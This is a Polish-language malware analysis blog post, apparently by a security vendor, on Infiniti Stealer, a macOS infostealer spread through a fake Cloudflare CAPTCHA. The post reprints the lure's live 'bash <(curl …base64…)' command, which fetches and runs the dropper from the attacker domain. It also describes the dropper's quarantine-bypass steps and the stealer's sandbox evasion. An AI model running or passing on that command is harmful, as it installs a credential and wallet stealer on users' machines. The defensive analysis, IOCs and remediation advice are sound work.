Infiniti Stealer: nowy program do kradzieży danych w systemie macOS wykorzystujący ClickFix oraz Python/Nuitka

| 26 marca 2026 r.
Logo Apple na tle łańcucha

W trakcie naszych rutynowych działań związanych z wykrywaniem zagrożeń natrafiliśmy na nieznany dotąd program typu infostealer przeznaczony dla systemu macOS. Początkowo śledziliśmy go pod nazwą NukeChain, ale na krótko przed publikacją panel operatora tego złośliwego oprogramowania stał się publicznie dostępny, ujawniając jego prawdziwą nazwę: Infiniti Stealer.

To złośliwe oprogramowanie zostało stworzone w celu kradzieży poufnych danych z komputerów Mac. Rozprzestrzenia się za pośrednictwem fałszywej strony z kodem CAPTCHA, która nakłania użytkowników do samodzielnego uruchomienia polecenia: jest to technika znana jako ClickFix. Zamiast wykorzystywać lukę w zabezpieczeniach, opiera się ona na socjotechnice.

Ostateczna wersja złośliwego oprogramowania została napisana w języku Python i skompilowana za pomocą Nuitka, w wyniku czego powstał natywny plik binarny dla systemu macOS. To sprawia, że jest ono trudniejsze do analizy i wykrycia niż typowe złośliwe oprogramowanie oparte na języku Python.

Zgodnie z naszą wiedzą jest to pierwsza udokumentowana kampania ataków na system macOS, łącząca wykorzystanie narzędzia ClickFix z programem typu stealer napisanym w języku Python i skompilowanym przy użyciu Nuitka.

ClickFix: socjotechnika zamiast luk w zabezpieczeniach

ClickFix nie wykorzystuje luk w zabezpieczeniach oprogramowania. Zamiast tego polega na nakłonieniu użytkownika do samodzielnego uruchomienia polecenia.

Fałszywa strona weryfikacyjna nakazuje odwiedzającemu otworzyć Terminal, wkleić polecenie i nacisnąć klawisz Return. Po wykonaniu polecenia proces infekcji rozpoczyna się natychmiast. Technika ta zyskała popularność w Windows , ale obecnie jest dostosowywana do systemu macOS, a instrukcje są dostosowane do tej platformy: Command + Space > otwórz Terminal > wklej polecenie

Ponieważ użytkownik uruchamia polecenie bezpośrednio, wiele tradycyjnych zabezpieczeń zostaje ominiętych. Nie ma tu żadnego exploita, złośliwego załącznika ani pobrania typu drive-by.

Fałszywe CAPTCHA

Zakażenie zaczyna się w update-check[.]com, która wyświetla przekonującą replikę strony Cloudflare służącej do weryfikacji tożsamości użytkownika.

Fałszywy CAPTCHA serwisu Cloudflare

Na stronie znajduje się instrukcja, aby użytkownik wkleił polecenie weryfikacyjne do Terminala:

bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode))

Polecenie w terminalu

Po zdekodowaniu ciąg znaków przekształca się w adres URL znajdujący się w tej samej domenie, który zwraca skrypt typu dropper pierwszego etapu.

Etap 1: Program typu „bash dropper”

Pierwszym ładunkiem jest skrypt Bash wykorzystujący szablon, który wcześniej zaobserwowano w programach wykradających dane z systemu macOS, takich jak MacSync (w wcześniejszych badaniach określany również jako SHub). Sugeruje to wykorzystanie wspólnego narzędzia do tworzenia oprogramowania.

Jego zadania są proste:

  • Odkoduj osadzony ładunek
  • Zapisz plik binarny Stage-2 w /tmp
  • Usuń oznaczenie kwarantanny za pomocą xattr -dr com.apple.quarantine
  • Uruchom plik wykonywalny za pomocą nohup
  • Przekaż serwer dowodzenia i kontroli (C2) oraz token uwierzytelniający jako zmienne środowiskowe
  • Usuń ten plik i zamknij Terminal za pomocą AppleScript

Etap 2: Nuitka Loader

Przesłany plik binarny to plik wykonywalny Apple Silicon Mach-O (~8,6 MB), skompilowany przy użyciu trybu onefile biblioteki Nuitka.

Jego nagłówek zawiera następujący podpis:

4b 41 59 28 b5 2f fd

Odpowiada to KAY ( nagłówek, po którym następuje archiwum skompresowane przy użyciu biblioteki zstd, wykorzystywane przez Nuitkę do pakowania aplikacji w języku Python.

W przeciwieństwie do PyInstallera, Nuitka kompiluje kod źródłowy w języku Python do języka C i tworzy natywny plik binarny, co zwiększa złożoność analizy statycznej.

W trakcie działania program ładujący rozpakowuje około 35 MB danych osadzonych i uruchamia ostateczną część ładunku.

Etap 3: Ładunek programu typu „stealer” w języku Python

Ostateczny ładunek, UpdateHelper[.]binjest to program typu stealer napisany w języku Python 3.11 i skompilowany przy użyciu biblioteki Nuitka.

Etap 3

Pomimo kompilacji plik binarny udostępnia tysiące nazwanych symboli, co pozwala na odtworzenie struktury modułów podczas analizy.

Program ten atakuje szeroki zakres poufnych danych:

  • Dane logowania z przeglądarek opartych na silniku Chromium oraz z przeglądarki Firefox
  • Wpisy w pęku kluczy systemu macOS
  • Portfele kryptowalutowe
  • Tajne dane w postaci zwykłego tekstu w plikach deweloperskich, takich jak .env
  • Zrzuty ekranu wykonane podczas działania programu

Dane są wykradane za pomocą żądań HTTP POST.

Przed rozpoczęciem gromadzenia danych złośliwe oprogramowanie sprawdza, czy działa w znanych środowiskach analitycznych, w tym:

  • any.run
  • Joe Sandbox
  • Analiza hybrydowa
  • VMware
  • VirtualBox

Wprowadza również losowe opóźnienie w wykonywaniu, aby uniknąć wykrycia przez systemy automatycznej analizy.

Po zakończeniu eksfiltracji wywoływana jest funkcja o nazwie upload_complete() wysyła powiadomienie w aplikacji Telegram do operatora i umieszcza przechwycone dane uwierzytelniające w kolejce do łamania haseł po stronie serwera.

Co zrobić, jeśli uważasz, że problem dotyczy również Ciebie

Coraz mniej osób uważa, że system macOS stanowi cel o niskim ryzyku dla złośliwego oprogramowania.

Infiniti Stealer pokazuje, jak techniki, które sprawdzały się w Windows– takie jak ClickFix – są obecnie dostosowywane do potrzeb Mac .

Wykorzystuje ono również nowsze techniki, takie jak kompilacja kodu w języku Python do postaci aplikacji natywnych, co utrudnia wykrycie i analizę tego złośliwego oprogramowania. Jeśli to podejście okaże się skuteczne, możemy spodziewać się kolejnych ataków tego typu.

Jeśli postępowałeś zgodnie z instrukcjami tego typu lub wklejałeś polecenia do Terminala ze strony internetowej, podejmij natychmiastowe działania:

  1. Należy zaprzestać korzystania z urządzenia do wykonywania czynności wymagających szczególnej ostrożności (operacje bankowe, poczta elektroniczna, konta służbowe).
  2. Zmień hasła na urządzeniu, na którym nie ma żadnych danych, zaczynając od kont e-mailowych, bankowych i Apple ID.
  3. Cofnij dostęp: wyloguj się z aktywnych sesji oraz cofnij tokeny API i klucze SSH
  4. Sprawdź, czy nie ma podejrzanych plików w /tmp oraz ~/Library/LaunchAgents/
  5. Uruchom pełne Malwarebytes , aby wykryć i usunąć wszelkie pozostałe złośliwe oprogramowanie.

Pamiętaj: nie wklejaj poleceń do Terminala ze stron internetowych. Żaden wiarygodny system CAPTCHA tego nie wymaga.

Wskaźniki kompromisu (IOC)

TypWartość
program typu dropper wykorzystujący algorytm MD5da73e42d1f9746065f061a6e85e28f0c
SHA256 – etap 31e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958
Domena C2update-check[.]com
C2 URLhttps://update-check[.]com/m/7d8df27d95d9
Panel C2Infiniti-stealer[.]com
Magia Packera4b 41 59 28 b5 2f fd (KAY + zstd)
Dziennik debugowania/tmp/.bs_debug.log
Ścieżka tymczasowa/tmp/.2835b1b5098587a9XXXXXX (stały przedrostek, losowy przyrostek)


Podziękowania

Podziękowania dla Marcelo Rivero za analizę plików binarnych.


Nie tylko informujemy o zagrożeniach - my je usuwamy

Zagrożenia cyberbezpieczeństwa nigdy nie powinny wykraczać poza nagłówek. Chroń swoje urządzenia przed zagrożeniami, pobierając Malwarebytes już dziś.

O autorze

Pasjonat rozwiązań antywirusowych, Stefan od najmłodszych lat zajmuje się testowaniem złośliwego oprogramowania i kontrolą jakości produktów AV. Jako członek zespołu Malwarebytes , Stefan jest oddany ochronie klientów i zapewnianiu im bezpieczeństwa.